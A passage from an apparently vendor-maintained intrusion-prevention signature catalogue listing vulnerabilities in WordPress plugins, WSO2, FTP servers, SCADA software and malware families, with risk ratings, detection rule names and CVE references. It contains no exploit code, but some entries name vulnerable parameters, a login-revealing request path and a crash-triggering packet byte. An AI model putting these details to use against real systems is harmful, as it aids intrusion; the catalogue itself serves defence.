
sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress Tribulant Slideshow Gallery

Type:

Insecure Configuration

Description:

An unrestricted file upload vulnerability exists in WordPress Tribulant Slideshow Gallery, versions before 1.4.7, which allow remote attackers to execute arbitrary code by uploading a PHP file then executing it by requesting the file.

Situation:

HTTP_CS-Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload

References:

CVE-2014-5460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460

Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Tutor LMS Plugin

Risk:

High

First detected in:

sgpkg-ips-1838-5242

Last changed:

sgpkg-ips-1838-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the Tutor LMS Plugin for WordPress. The vulnerability is due to insufficient user input validation of the rating_filter parameter. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CRL-Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection

References:

CVE-2024-10400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10400

Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Ultimate Member Plugin

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A time-based blind SQL Injection vulnerability has been reported in Ultimate Member plugin of WordPress. The vulnerability is due to insufficient sanitization of user-supplied data in the sorting parameter. A remote unauthenticated attacker can exploit the vulnerability by sending crafted requests to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CRL-Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection

References:

CVE-2024-1071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1071

Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress UserPro plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in the WordPress UserPro plugin versions up to 4.9.32. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting

References:

CVE-2019-14470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470

Wordpress-W3-Total-Cache-PHP-Code-Execution

About this vulnerability:

A Wordpress W3 Total Cache PHP Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress W3 Total Cache

Type:

PHP Injection

Description:

A PHP code execution vulnerability in WordPress W3 Total Cache 0.9.2.8 which allows remote attackers to execute arbitrary PHP code in context of the web server.

Situation:

HTTP_CRL-Wordpress-W3-Total-Cache-PHP-Code-Execution

References:

CVE-2013-2010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2010

BID-59316
http://www.securityfocus.com/bid/59316

OSVDB-92652
http://www.osvdb.org/92652

Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063

About this vulnerability:

A vulnerability in WordPress WP Fastest Cache plugin

Risk:

High

First detected in:

sgpkg-ips-1659-5242

Last changed:

sgpkg-ips-1659-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in WP Fastest Cache WordPress plugin versions prior to 1.2.2. An unauthenticated attacker can exploit this vulnerability via a maliciously crafted value of a wordpress_logged_in Cookie.

Situation:

HTTP_CSH-Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063

References:

CVE-2023-6063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063

Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution

About this vulnerability:

A vulnerability in Wordpress wp-gdpr-compliance plugin

Risk:

High

First detected in:

sgpkg-ips-1385-5242

Last changed:

sgpkg-ips-1385-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

There exists a vulnerability in WordPress wp-gdpr-compliance plugin, versions prior to 1.4.3. Successful exploitation allows remote attackers to execute arbitrary code.

Situation:

HTTP_CRL-Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution

References:

CVE-2018-19207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19207

Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013

About this vulnerability:

A vulnerability in Wordpress WP Marketplace Plugin

Risk:

High

First detected in:

sgpkg-ips-1322-5242

Last changed:

sgpkg-ips-1322-5242

Platform:

Generic

Software:

Wordpress WP Marketplace Plugin

Type:

Input Validation

Description:

A vulnerability in Wordpress WP Marketplace Plugin 2.4.0. may allow remote authenticated users to create arbitrary users with admin privileges.

Situation:

HTTP_CRL-Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013

References:

CVE-2014-9013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9013

Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability

About this vulnerability:	A vulnerability in WordPress
Risk:	Moderate
First detected in:	sgpkg-ips-775-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress WP Mobile Detector Plugin
Type:	Malfunction
Description:	A vulnerability in the WordPress plugin WP Mobile Detector allows a remote attacker to upload arbitrary files to the affected site.
Situation:	HTTP_CSU-Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability

Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370

About this vulnerability:

A vulnerability in WordPress WP Shortcodes Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the WP Shortcodes Plugin for WordPress. This vulnerability is due to improper input validation on the src parameter. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370

References:

CVE-2025-0370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0370

Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project WP Statistics

Risk:

Moderate

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data in current_page_id and current_page_type parameters causes an SQL injection vulnerability in WordPress. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection

References:

CVE-2022-25148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25148

Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project WP Statistics

Risk:

High

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1716-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the WordPress Plugin WP Statistics. The vulnerability is due to improper validation of user input in the getTop method. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary script execution in the context of user's browser.

Situation:

HTTP_CSU-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting

References:

CVE-2024-2194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2194

Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project WP Statistics

Risk:

Moderate

First detected in:

sgpkg-ips-1444-5242

Last changed:

sgpkg-ips-1483-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data causes an SQL injection vulnerability in WordPress. A successful exploit allows an attacker to execute arbitrary SQL on the target system. This situation also covers CVE-2022-25305.

Situation:

HTTP_CRL-Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection

References:

CVE-2022-25149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25149

Wordpress-WP-Time-Capsule-Arbitrary-File-Upload

About this vulnerability:

An attempt to exploit a vulnerability in WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper handling of requests sent to the Time Capsule plugin for Wordpress causes an arbitrary file upload vulnerability which allows an attacker to upload PHP code to be executed by the target system.

Situation:

HTTP_CS-Wordpress-WP-Time-Capsule-Arbitrary-File-Upload

References:

CVE-2024-8856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8856

Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in WordPress Project WP Time Capsule

Risk:

Moderate

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper input validation when handling file upload in UploadHandler.php causes an unrestricted file upload vulnerability in WordPress Time Capsule plugin. A successful exploitation allows an attacker to upload arbitrary files and execute code on the target system.

Situation:

HTTP_CS-Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload

References:

CVE-2024-8856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8856

Wordpress-wpDiscuz-Unauthenticated-File-Upload

About this vulnerability:

A vulnerability in WordPress wpDiscuz.

Risk:

High

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

WordPress wpDiscuz

Type:

Input Validation

Description:

A vulnerability in WordPress wpDiscuz, versions 7.0.0 through 7.0.4, which allows remote unauthenticated attackers to upload arbitrary files, including PHP files, and achieve remote code execution.

Situation:

HTTP_CS-Wordpress-wpDiscuz-Unauthenticated-File-Upload

References:

CVE-2020-24186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186

Wordpress-WPS-Hide-Login-Login-Page-Revealer

About this vulnerability:

An attempt to exploit a vulnerability in the WPS Hide Login plugin.

Risk:

Moderate

First detected in:

sgpkg-ips-1434-5242

Last changed:

sgpkg-ips-1434-5242

Platform:

Generic

Software:

WPS Hide Login Plugin

Type:

Insecure Configuration

Description:

A vulnerability in the WordPress WPS Hide Login plugin, versions 1.9 and before, which allows remote attackers to reveal the hidden path to the login page by sending a GET request to /wp-admin/options.php.

Situation:

HTTP_CSU-Wordpress-WPS-Hide-Login-Login-Page-Revealer

References:

CVE-2021-24917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917

Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal

About this vulnerability:

A vulnerability in WordPress Project WPvivid Backup Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1523-5242

Last changed:

sgpkg-ips-1523-5242

Platform:

Generic

Software:

WordPress

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported for the WordPress WPvivid Backup Plugin. This vulnerability is due to the plugin does not validate the file_name parameter. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary file read access in the security context of the web server.

Situation:

HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal

References:

CVE-2022-2863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2863

Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization

About this vulnerability:

A vulnerability in WordPress WPvivid Backup Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1725-5242

Last changed:

sgpkg-ips-1725-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in WordPress WPvivid Backup Plugin. This vulnerability is due to insufficient path validation of the tree_node[node][id] and tree_node[path] HTTP POST parameters in the "wpvividstg_get_custom_exclude_path_free" and "wpvividstg_get_custom_include_path_free" actions. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will result in arbitrary code execution within the security context of the user running the vulnerable WP instance.

Situation:

HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization

References:

CVE-2024-3054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3054

Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal

About this vulnerability:

A vulnerability in WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress

Type:

Directory Traversal

Description:

Improper processing of a _wp_attached_file Post Meta entry causes a directory traversal vulnerability in WordPress. A successful exploit allows ana attacker to upload files with PHP code that will be executed.

Situation:

HTTP_CRL-Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal

References:

CVE-2019-8942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942

Worldweaver-DX-Studio-Player-Command-Execution

About this vulnerability:

A Worldweaver DX Studio Player Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Worldweaver DX Studio Player

Type:

Input Validation

Description:

A vulnerability in Worldweaver DX Studio Player, versions before 3.0.29.1, which allows remote attackers to execute arbitrary commands via a .dxstudio file that invokes the shell.execute JavaScript API method.

Situation:

File-Text_Worldweaver-DX-Studio-Player-Command-Execution

References:

CVE-2009-2011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2011

BID-35273
http://www.securityfocus.com/bid/35273

OSVDB-54969
http://www.osvdb.org/54969

Worm-Autorun-Aaeb-H

About this vulnerability:	W32/Autorun.worm.aaeb-h
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Autorun.worm.aaeb-h is a worm that spreads by creating copies of itself in removable storage devices and mounted network shares.
Situation:	DNS-UDP_Worm-Autorun-Aaeb-H-Request DNS-UDP_Worm-Autorun-Aaeb-H-Response-Detected

Worm-Nimda

About this vulnerability:	Nimda worm
Risk:	High
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Nimda
Type:	Malfunction
Description:	Nimda is a Windows worm that has multiple spread vectors.
Situation:	SMB-TCP_CHS-Possible-Nimda-Eml-Spread SMB-TCP_CHS-Possible-Nimda-Nws-Spread SMB-TCP_CHS-Possible-Nimda-Riched20-DLL-Spread TFTP_CS-Admin-DLL-Download-Request

WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003

About this vulnerability:

A vulnerability in WPCargo WordPress plugin

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in the WPCargo Track & Trace WordPress plugin. Successful exploitation can allow an unauthenticated attacker to create a PHP file in any location on the target server and run arbitrary code.

Situation:

HTTP_CRL-WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003

References:

CVE-2021-25003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003

WPEverest-WordPess-Plugin-Arbitrary-File-Upload

About this vulnerability:

A vulnerability WorpPress

Risk:

Moderate

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Missing file type validation causes a file upload vulnerability in the user registration functionality in the WPEverest WordPess plugin. A successful exploit allows an attacker to upload and execute code on the target system.

Situation:

HTTP_CS-WPEverest-WordPess-Plugin-Arbitrary-File-Upload

References:

CVE-2023-3342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3342

WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249

About this vulnerability:

A vulnerability in wpForo WordPress plugin

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A local file inclusion and server side request forgery vulnerability has been reported in wpForo plugin for WordPress.

Situation:

HTTP_CRL-WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249

References:

CVE-2023-2249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2249

WS-FTP-Server-Multiple-Commands-BOF

About this vulnerability:

Multiple commands buffer overflow in WS_FTP server

Risk:

High

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000

Software:

WS_FTP Server

Type:

Buffer Overflow

Description:

WS_FTP Server version is vulnerable to a buffer overflow. By sending an FTP command, such as SITE, XMKD, MKD, or RNFR, a remote authenticated attacker could overflow a buffer and cause the FTP server to crash or execute arbitrary code on the system.

Situation:

FTP_CS-WS-FTP-Server-Multiple-Commands-Potential-BOF
FTP_CS-WS-FTP-Server-Multiple-Commands-BOF

References:

CVE-2004-1135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1135

BID-11772
http://www.securityfocus.com/bid/11772

WSHRAT-Malware-Infection-Traffic

About this vulnerability:	WSHRAT malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1274-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	WSHRAT malware infection traffic was detected.
Situation:	HTTP_CRH-WSHRAT-Malware-Infection-Traffic

WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WSO2 Enterprise Integrator

Risk:

Moderate

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Generic

Software:

WSO2

Type:

Input Validation

Description:

Improper input validation in the /carbon/ndatasource/validateconnection-ajaxprocessor.jsp endpoint causes a cross-site scripting vulnerability in WSO2 Enterprise Integrator. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting

References:

CVE-2022-39810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39810

WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074

About this vulnerability:

A vulnerability in multiple WSO2 products

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

WSO2

Type:

Input Validation

Description:

A vulnerability in multiple WSO2 products which allows remote attackers to execute arbitrary code on a target server via a directory traversal, due to improper validation of user data sent using the SynapseArtifactUploaderAdmin endpoint.

Situation:

File-TextId_WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074

References:

CVE-2024-7074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7074

WSO2-Unrestricted-File-Upload-CVE-2022-29464

About this vulnerability:

A vulnerability in WSO2

Risk:

High

First detected in:

sgpkg-ips-1458-5242

Last changed:

sgpkg-ips-1458-5242

Platform:

Generic

Software:

WSO2

Type:

Input Validation

Description:

An arbitrary file upload vulnerability has been reported in certain versions of WSO2 API Manager, WSO2 Identity Server, and WSO2 Enterprise Integrator. Successful exploitation of this vulnerability could allow unauthenticated attackers to execute arbitrary code.

Situation:

HTTP_CS-WSO2-Unrestricted-File-Upload-CVE-2022-29464

References:

CVE-2022-29464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29464

WU-FTPD-Fnmatch-Function-Asterisk-DoS

About this vulnerability:

Denial of service vulnerability in WU-FTPD wu_fnmatch function

Risk:

Low

First detected in:

sgpkg-ips-22-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

WU-FTPD

Type:

Malfunction

Description:

Washington University FTP daemon (WU-FTPD) contains a denial of service vulnerability in wu_fnmatch function. A remote attacker could exploit this vulnerability by creating a specially-crafted DIR command with multiple asterisks (*) to cause a denial of service on the vulnerable server.

Situation:

FTP_CS-WU-FTPD-Fnmatch-Function-Asterisk-DoS

References:

CVE-2005-0256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256

OSVDB-14203
http://www.osvdb.org/14203

WU-FTPD-Realpath-Off-By-One-BOF

About this vulnerability:

WU-FTPD realpath() off-by-one vulnerability

Risk:

High

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WU-FTPD

Type:

Buffer Overflow

Description:

A remote exploitable off-by-one buffer overflow exists in some versions of the WU-FTPD ftp server. If successfully exploited, the attacker is able to gain remote root access.

Situation:

FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-Linux
FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-BSD

References:

CVE-2003-0466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466

BID-8315
http://www.securityfocus.com/bid/8315

OSVDB-6602
http://www.osvdb.org/6602

WU-FTPD-Site-Exec-Format-String-Vulnerability

About this vulnerability:

Format String Vulnerabiity in WU-FTPD

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; FreeBSD; SCO; Solaris

Software:

WU-FTPD

Type:

Format String

Description:

Certain versions of WU-FTPD have a format string vulnerability that can be exploited to gain remote root access.

Situation:

FTP_CS-Site-Exec
FTP_CS-Site-Exec-WU-Lnx
FTP_CS-Site-Exec-7350wu
FTP_CS-Site-Exec-Lnx-Wu2600
FTP_CS-Site-Exec-FreeBSD
FTP_CS-Site-Exec-Solaris-Sparc
FTP_CS-Site-Exec-FreeBSD-WU-FTPD
FTP_CS-Site-Exec-WU-FTPD-Bobek

References:

CVE-2000-0573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0573

BID-1387
http://www.securityfocus.com/bid/1387

OSVDB-351
http://www.osvdb.org/351

WU-IMAP-POP-Login-Buffer-Overflow

About this vulnerability:

Buffer overflow in University of Washington imapd

Risk:

Critical

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

University of Washington imapd; University of Washington pop2d

Type:

Buffer Overflow

Description:

A Buffer overflow vulnerability exists in the authentication process of the University of Washington imap and pop2 daemons.

Situation:

IMAP_WU-IMAPD-Authenticate-BOF

References:

CVE-1999-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0042

BID-130
http://www.securityfocus.com/bid/130

Wwbn-Avideo-Chunkfile-Command-Injection

About this vulnerability:

A vulnerability in WWBN AVideo

Risk:

Moderate

First detected in:

sgpkg-ips-1501-5242

Last changed:

sgpkg-ips-1501-5242

Platform:

Generic

Software:

WWBN AVideo

Type:

Input Validation

Description:

Improper input validation when executing a command causes a command injection vulnerability in WWBN AVideo. A successful exploit allows an attacker to execute arbitrary commands with the privileges of the target application.

Situation:

HTTP_CRL-Wwbn-Avideo-Chunkfile-Command-Injection

References:

CVE-2022-30534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30534

Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WWBN AVideo

Risk:

Moderate

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Generic

Software:

WWBN AVideo

Type:

Input Validation

Description:

Improper validation on the error message in image403.php causes a cross-site scripting vulnerability in WWBN AVideo. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting

References:

CVE-2022-30690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30690

Wwbn-Avideo-Wget-Downloadurl-Command-Injection

About this vulnerability:

A vulnerability in WWBN AVideo

Risk:

Moderate

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Generic

Software:

WWBN AVideo

Type:

Input Validation

Description:

Improper input validation when constructing a wget command line causes a command injection vulnerability in WWBN AVideo. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Wwbn-Avideo-Wget-Downloadurl-Command-Injection

References:

CVE-2022-32572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32572

WzdFTPD-Site-Command-Remote-Command-Execution

About this vulnerability:

Command execution vulnerability in WzdFTPD

Risk:

Moderate

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WzdFTPD

Type:

Metacharacter

Description:

There exists a vulnerability in the parsing of SITE command in WzdFTPD. Remote attacker may be able to exploit this vulnerability to execute arbitrary shell commands on the victim server.

Situation:

FTP_CS-WzdFTPD-Site-Command-Remote-Command-Execution

References:

CVE-2005-3081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3081

BID-14935
http://www.securityfocus.com/bid/14935

OSVDB-19682
http://www.osvdb.org/19682

XAR-Archive-File-Transfer

About this vulnerability:	Arbitary XAR archive file transfer
Risk:	Low
First detected in:	sgpkg-ips-172-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	XAR
Type:	Insecure Configuration
Description:	XAR, eXtensible ARchiver, is a archiver format used by Mac OS X for installation packages. It may be used to download arbitrary executable content from untrusted sources.
Situation:	Shared_CS-XAR-File-Upload Shared_SS-XAR-Archive-Download File-Binary_XAR-Archive

xArrow-SCADA-HMI-DoS-Ver1

About this vulnerability:	A vulnerability in xArrow SCADA control software, decompression NULL pointer, allowing DoS.
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	xArrow
Type:	Malfunction
Description:	A vulnerability in xArrow SCADA control software. Buffer returned from calloc() is not checked when allocating memory, allowing DoS.
Situation:	Generic_CS-xArrow-SCADA-HMI-DoS-Ver1

xArrow-SCADA-HMI-DoS-Ver2

About this vulnerability:	A vulnerability in xArrow SCADA control software, possible heap corruption, allowing DoS.
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	xArrow
Type:	Malfunction
Description:	A vulnerability in xArrow SCADA control software. Memory buffer size is not checked. An attacker may use an insufficient memory size, causing a heap corruption, allowing DoS.
Situation:	Generic_CS-xArrow-SCADA-HMI-DoS-Ver2

xArrow-Webserver-DoS

About this vulnerability:	A vulnerability in xArrow Webserver software, allowing DoS.
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	xArrow
Type:	Malfunction
Description:	xArrow Webserver software, listening on port 80 is vulnerable to a TCP packet starting with \x0a, allowing an attacker to carry out a DoS attack.
Situation:	HTTP_CS-xArrow-Webserver-DoS

Xarvester-Spambot

About this vulnerability:	Xarvester spambot is a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-272-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Xarvester spambot
Type:	Backdoor
Description:	Xarvester spambot is a template-based spamming engine.
Situation:	Generic_CS-Xarvester-Spambot

XCSSET-Malware-Traffic

About this vulnerability:	XCSSET malware traffic
Risk:	High
First detected in:	sgpkg-ips-1405-5242
Last changed:	sgpkg-ips-1405-5242
Platform:	Mac OS
Software:	<os>
Type:	Backdoor
Description:	XCSSET malware targets macOS and has capabilities to exfiltrate information from the compromised device.
Situation:	HTTP_CSU-XCSSET-Malware-Traffic HTTP_CRL-XCSSET-Malware-Traffic-2

Xdmcp-Double-Free

About this vulnerability:

A vulnerability in Sun Microsystems Solaris

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris 8

Software:

<os>

Type:

Malfunction

Description:

A double-free vulnerability has been reported within the dtlogin daemon, a component of the Common Desktop Environment (CDE), shipped with many enterprise UNIX platforms including Sun's solaris, Hewlett-Packard's HP-UX and Tru64, IBM's AIX, SCO OpenServer, and others. This vulnerability is reported to be exploitable for injection of code which would then run with the privilege of the dtlogin process (normally root).

Situation:

Generic_UDP-Xdmcp-Double-Free

References:

CVE-2004-0368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0368

BID-9958
http://www.securityfocus.com/bid/9958

Xen-Project-Xapi-Update-Directory-Traversal

About this vulnerability:

A vulnerability in Xen Project XAPI

Risk:

Moderate

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Xen Project XAPI

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in the XAPI component of Xen. A remote attacker can exploit this vulnerability without authentication by sending a maliciously crafted request to the target server. Successful exploitation can lead to arbitrary file read.

Situation:

HTTP_URI-Xen-Project-Xapi-Update-Directory-Traversal

References:

CVE-2018-14007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14007

Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection

About this vulnerability:

A vulnerability in Xerox DocuShare

Risk:

